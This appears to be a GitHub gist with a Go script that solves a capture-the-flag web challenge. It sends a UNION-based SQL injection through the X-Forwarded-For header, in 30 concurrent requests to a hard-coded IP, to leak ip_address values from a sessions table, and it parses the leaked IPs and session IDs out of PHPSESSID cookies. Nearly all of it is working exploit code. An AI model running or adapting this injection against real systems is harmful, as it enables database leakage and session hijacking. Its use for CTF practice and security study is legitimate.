
@chtzvt
Last active February 18, 2019 03:33
// https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/
// 🂁 ctrezevant@sdf ~ $ time go run ctf.go
// go run ctf.go 1.17s user 0.45s system 48% cpu 3.341 total
package main
import (
"fmt"
"math/rand"
"net/http"
"regexp"
"sync"
"time"
)
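// main fans out 30 concurrent calls to sendPayload, one per value of the
// id placeholder (0..29) in the payload template, and blocks until every
// worker has returned.
//
// The payload is a SQL fragment delivered in the X-Forwarded-For header, so
// the challenge service presumably interpolates that header into a query
// unescaped. The server-side remedy is to treat client-supplied headers as
// untrusted input and bind them as query parameters.
func main() {
	url := "http://35.222.174.178/maria/"
	payload := "kfdad' or id = '6969' union select 'test',1,2,(select ip_address from nxf8_sessions WHERE id=%d) from nxf8_sessions--"

	var wg sync.WaitGroup
	for i := 0; i < 30; i++ {
		// Add must happen before the goroutine is started: when it is called
		// inside the goroutine, Wait can observe a zero counter and return
		// before any worker has registered, ending the program early.
		wg.Add(1)
		go func(url, payload *string, offset int) {
			// Deferred so the counter is released even if sendPayload panics.
			defer wg.Done()
			// A few microseconds of jitter so the workers do not all fire at
			// exactly the same instant.
			time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
			sendPayload(url, payload, offset)
		}(&url, &payload, i)
	}
	wg.Wait()
}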
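// sendPayload issues a single GET to *url with the X-Forwarded-For header set
// to *query formatted with offset, then inspects the PHPSESSID cookies of the
// response and prints one result line when both expected values are present.
//
// The response is expected to carry more than one cookie named PHPSESSID: a
// value containing no ASCII letters is taken as the leaked column (an IP
// address), and any other value except "deleted" is taken as the session id.
// Errors and non-200 responses are reported on stdout and the call returns
// without a result.
func sendPayload(url, query *string, offset int) {
	// Bound the whole exchange so a stalled server cannot block a worker
	// (and therefore main's Wait) forever.
	client := &http.Client{Timeout: 10 * time.Second}

	req, err := http.NewRequest("GET", *url, nil)
	if err != nil {
		// Newline-terminated so messages from concurrent workers do not run
		// together on one line.
		fmt.Println("sendPayload: " + err.Error())
		return
	}
	req.Header.Add("X-Forwarded-For", fmt.Sprintf(*query, offset))

	res, err := client.Do(req)
	if err != nil {
		fmt.Println("sendPayload: " + err.Error())
		return
	}
	if res != nil {
		// The body is never read, but it must still be closed or the
		// connection and its file descriptor are leaked.
		defer res.Body.Close()
	}
	if res == nil || res.StatusCode != 200 {
		fmt.Printf("sendPayload: response is nil or != 200 for offset %d\n", offset)
		return
	}

	// Loose heuristic, not IP validation: matches any non-empty value that
	// contains no ASCII letters.
	isIP := regexp.MustCompile(`^[^a-zA-Z]+$`).MatchString

	var ipAddr string
	var sessionID string
	for _, cookie := range res.Cookies() {
		if cookie.Name != "PHPSESSID" {
			continue
		}
		switch {
		case isIP(cookie.Value):
			ipAddr = cookie.Value
		case cookie.Value != "deleted":
			sessionID = cookie.Value
		}
	}

	// Only report rows for which both halves were recovered.
	if ipAddr != "" && sessionID != "" {
		fmt.Printf("[ID: %d IP: %s SESSID: %s]\n", offset, ipAddr, sessionID)
	}
}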